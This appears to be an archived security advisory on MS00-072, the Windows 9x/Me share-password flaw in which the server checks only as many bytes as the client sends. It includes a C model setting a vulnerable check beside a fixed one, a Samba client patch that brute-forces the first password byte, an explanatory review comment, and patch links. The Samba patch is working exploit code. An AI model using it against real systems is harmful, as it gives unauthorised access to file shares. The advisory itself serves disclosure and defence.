COMMAND

    Share

SYSTEMS AFFECTED

    Microsoft Windows 95, 98, 98 SE, Me

PROBLEM

    The following is based on Microsoft Security Bulletin MS00-072; the
    issue was originally found by the Nsfocus Security Team. Microsoft
    Windows 9x/Me provides a password protection feature, referred to as
    "share level access", for the File and Print Sharing service.
    However, because of the way the password feature is currently
    implemented, a malicious user using a special client utility could
    gain access to a file share without knowing the entire password
    required to access that share.

    Only share-level access permissions are vulnerable. If a Windows 9x
    or Windows Me machine is part of a Windows NT domain, user-level
    access controls can be enforced on file shares, and share passwords
    are then not needed to grant access to those shares. Windows NT and
    Windows 2000 machines can only be set up with user-level file share
    access controls and are not susceptible to this vulnerability.

    A password can be set to protect a Microsoft Windows 9x system's
    shared resources. However, a vulnerability exists in the password
    verification scheme used by the Microsoft Windows 9x NetBIOS
    protocol implementation. During verification, the number of password
    bytes compared is taken from the length of the data the client sent,
    not from the stored password. That is, if a client sets the password
    length to one byte and sends the packet with a plaintext password to
    the server, the server compares only that byte with the first byte
    of the stored (plaintext) share password, and if they match the
    verification is considered complete. All an attacker needs to do is
    guess and try the first byte of the victim's password.

    Windows 9x remote management is also affected, because it uses the
    same share password authentication method.
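    As an added illustration (not Microsoft's or Samba's code, and not
    part of the original advisory), the following C model shows the
    length-controlled comparison just described next to a hardened
    version: the vulnerable server compares only as many bytes as the
    client claims to have sent, while the fixed server insists on the
    full stored password. All names and the sample password are
    constructed for this example.

```c
/* Added illustration (not Microsoft's or Samba's code): a model of the
 * share-level password check the advisory describes. The server receives
 * the client's password bytes plus a client-chosen length; the vulnerable
 * check honours that length, the fixed check uses the stored password's
 * own length. All names and the sample password are constructed. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

typedef bool (*verify_fn)(const char *stored, const char *sent, size_t sent_len);

static const char STORED_SHARE_PASSWORD[] = "s3cret!";  /* constructed sample */

/* Vulnerable: the number of bytes compared is whatever the client claimed.
 * (Capped at the stored length only so this demo never reads past the string.) */
bool verify_share_password_vulnerable(const char *stored, const char *sent,
                                      size_t sent_len)
{
    size_t stored_len = strlen(stored);
    size_t n = sent_len < stored_len ? sent_len : stored_len;
    return memcmp(stored, sent, n) == 0;
}

/* Fixed: the server decides how many bytes must match; a length mismatch is
 * a failure, and the comparison does not stop at the first differing byte. */
bool verify_share_password_fixed(const char *stored, const char *sent,
                                 size_t sent_len)
{
    size_t stored_len = strlen(stored);
    if (sent_len != stored_len)
        return false;
    unsigned char diff = 0;
    for (size_t i = 0; i < stored_len; i++)
        diff |= (unsigned char)(stored[i] ^ sent[i]);
    return diff == 0;
}

/* Exposure check for a defender: how many of the possible one-byte
 * submissions does a given verifier accept for the stored password? */
int count_one_byte_accepts(verify_fn verify)
{
    int accepted = 0;
    for (int b = 1; b < 256; b++) {      /* 0 would be an empty C string */
        char probe[1] = { (char)b };
        if (verify(STORED_SHARE_PASSWORD, probe, 1))
            accepted++;
    }
    return accepted;
}
```

The vulnerable verifier accepts exactly one of the single-byte probes
(the one equal to the first byte of the stored password), while the
fixed verifier accepts none and still accepts the complete password.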

    Here is one simple example that demonstrates this bug. Get the Samba
    source package and modify source/client/client.c as follows:

    --- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
    +++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
    @@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
    
            DEBUG(4,(" session setup ok\n"));
    
    +/*
            if (!cli_send_tconX(c, share, "?????",
                                password, strlen(password)+1)) {
                    DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                    cli_shutdown(c);
                    return NULL;
            }
    +*/
    +
    +        password[0] = 0;
    +        c->sec_mode = 0;
    +        do{
    +
    +          password[0]+=1;
    +
    +        }while(!cli_send_tconX(c, share, "?????", password, 1));
    
            DEBUG(4,(" tconx ok\n"));
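
    Review bot: the hunk carries no comment, and the one change that
    actually makes the demonstration work is easy to miss: the
    commented-out call passed `strlen(password)+1` as the password
    length, while the replacement passes a fixed length of 1, so the
    server compares only `password[0]`, which is exactly the
    length-controlled comparison the advisory describes. A one-line
    comment above `}while(!cli_send_tconX(c, share, "?????", password, 1));`
    stating that the length argument is the point would help a reader.
    `c->sec_mode = 0;` is likewise undocumented; it presumably keeps the
    client on the plaintext-password path the advisory refers to, and
    should say so. From the defender's side the contrast between the
    two calls is the lesson: the server must compare against the full
    stored password length regardless of the length the client supplies.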

SOLUTION

    Patch availability:

        - Microsoft Windows 95: Patch available shortly
        - Microsoft Windows 98 and 98 Second Edition: http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
        - Microsoft Windows Me: http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

    The workaround is to disable the Microsoft File and Print Sharing
    service.